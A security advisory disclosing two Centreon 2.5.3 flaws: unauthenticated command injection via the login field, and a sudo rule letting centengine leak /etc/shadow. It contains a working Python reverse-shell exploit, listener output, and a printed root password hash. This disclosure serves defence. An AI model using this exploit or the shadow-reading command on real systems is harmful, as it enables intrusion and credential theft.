Centreon 2.5.3 Code Execution

`Unauthenticated Remote Command Execution in Centreon Web Interface  
==================================================================  
  
  
Description  
===========  
  
Centreon is a popular monitoring solution.  
  
A critical vulnerability has been found in the Centreon logging class  
allowing remote users to execute arbitrary commands.  
  
  
SQL injection leading to RCE  
============================  
  
Centreon logs SQL database errors in a log file using the "echo" system  
command and the exec() PHP function. On the authentification class,  
Centreon use htmlentities with the ENT_QUOTES options to filter SQL  
entities.  
However, Centreon doesn't filter the SQL escape character "\" and it is  
possible to generate an SQL Error.  
Because of the use of the "echo" system command with the PHP exec()  
function, and because of the lack of sanitization, it is possible to  
inject arbitrary system commands.  
  
**Access Vector**: remote  
  
**Security Risk**: high  
  
**Vulnerability**: CWE-78  
  
----------------  
Proof of Concept  
----------------  
  
TCP Reverse Shell using python.  
  
#!/usr/bin/env python  
import requests  
import argparse  
  
def shell(target, reverseip, reverseport):  
payload = 'import socket as a,subprocess as b,os as  
c;s=a.socket(2,1);s.connect(("%s",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call(["sh"]);'  
% (reverseip,reverseport)  
print "[~] Starting reverseshell : %s - port : %d" % (reverseip,  
reverseport)  
req = requests.post(target, data={"useralias": "$(echo %s |  
base64 -d | python)\\" % payload.encode("base64").replace("\n",""),  
"password": "foo"})  
print "[+] DEAD !"  
  
if __name__ == "__main__":  
print "[~] Centreon Unauthentificated RCE - Nicolas Chatelain  
<[email protected]>"  
parser = argparse.ArgumentParser()  
parser.add_argument("--target", required=True)  
parser.add_argument("--reverseip", required=True)  
parser.add_argument("--reverseport", required=True, type=int)  
args = parser.parse_args()  
shell(args.target, args.reverseip, args.reverseport)  
  
Shell :  
  
nightlydev@nworkstation ~/Lab/Centreon $ python reverseshell.py  
--target=http://172.16.138.137/centreon/index.php  
--reverseip=172.16.138.1 --reverseport 8888  
[~] Centreon Unauthentificated RCE - Nicolas Chatelain  
<[email protected]>  
[~] Starting reverseshell : 172.16.138.1 - port : 8888  
  
# Other term  
  
nightlydev@nworkstation ~/Lab/Centreon $ nc -lvp 8888  
Ncat: Version 6.45 ( http://nmap.org/ncat )  
Ncat: Listening on :::8888  
Ncat: Listening on 0.0.0.0:8888  
Ncat: Connection from 172.16.138.135.  
Ncat: Connection from 172.16.138.135:50050.  
whoami  
apache  
groups  
apache centreon-engine centreon-broker centreon nagios  
  
  
---------------  
Vulnerable code  
---------------  
  
The vulnerable code is located in class/centreonLog.class.php, line 82  
and line 154:  
  
  
/*  
* print Error in log file.  
*/  
exec("echo \"".$string."\" >> ".$this->errorType[$id]);  
  
In class/centreonAuth.class.php, line 227:  
  
$DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE  
`contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "'  
AND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1");  
  
  
--------  
Solution  
--------  
  
Update to the Centreon 2.5.4  
  
  
Possible root password disclosure in centengine (Centreon Entreprise Server)  
============================================================================  
  
In some configurations, when centengine can run as root (with sudo).  
It's possible to read some file content.  
  
**Access Vector**: local  
  
**Security Risk**: high  
  
**Vulnerability**: CWE-209  
  
----------------  
Proof of Concept  
----------------  
  
$ sudo /usr/sbin/centengine -v /etc/shadow  
[1416391088] reading main config file  
[1416391088] error while processing a config file: [/etc/shadow:1]  
bad variable name:  
'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'  
[1416391088]  
  
---------------  
Vulnerable code  
---------------  
  
In Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon  
  
CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *  
  
--------  
Solution  
--------  
  
Do not allow centengine to be run as root or do not disclose the line  
that caused the error.  
  
Timeline (dd/mm/yyyy)  
=====================  
  
* 18/11/2014 : Initial discovery  
* 26/11/2014 : Contact with Centreon team  
* 27/11/2014 : Centreon correct vulnerabilities  
* 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities  
  
Fixes  
=====  
  
*  
https://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9  
*  
https://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d  
*  
https://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1  
  
Affected versions  
=================  
  
* Centreon <= 2.5.3  
  
  
Credits  
=======  
  
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)  
  
  
Best regards,  
--   
SYSDREAM Labs <[email protected]>  
  
GPG :  
47D1 E124 C43E F992 2A2E  
1551 8EB4 8CD9 D5B2 59A1  
  
* Website: https://sysdream.com/  
* Twitter: @sysdream  
  
  
`